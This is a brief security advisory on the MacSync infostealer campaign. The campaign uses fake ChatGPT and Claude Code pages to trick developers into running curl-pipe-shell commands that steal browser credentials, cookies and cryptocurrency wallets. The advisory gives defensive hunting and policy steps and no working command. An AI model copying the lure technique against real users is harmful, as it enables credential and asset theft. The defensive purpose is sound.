The MacSync infostealer campaign (active November 2025 through at least March 2026) targets software developers on macOS and Windows via ClickFix-style lure pages impersonating ChatGPT and Anthropic Claude Code, tricking victims into executing curl-pipe-shell payloads that harvest browser credentials, session cookies, and cryptocurrency wallet contents from Exodus, Atomic, and Ledger; no CVE is assigned as this is a social engineering vector. Organizations with developer staff, particularly those holding cryptocurrency assets or accessing privileged internal systems, should circulate an advisory on the lure pattern, search shell history for curl-pipe-shell executions against unrecognized domains, and review macOS LaunchAgent directories and Chrome credential store access events for compromise indicators. Prohibit curl-pipe-shell execution without prior code review as a policy control.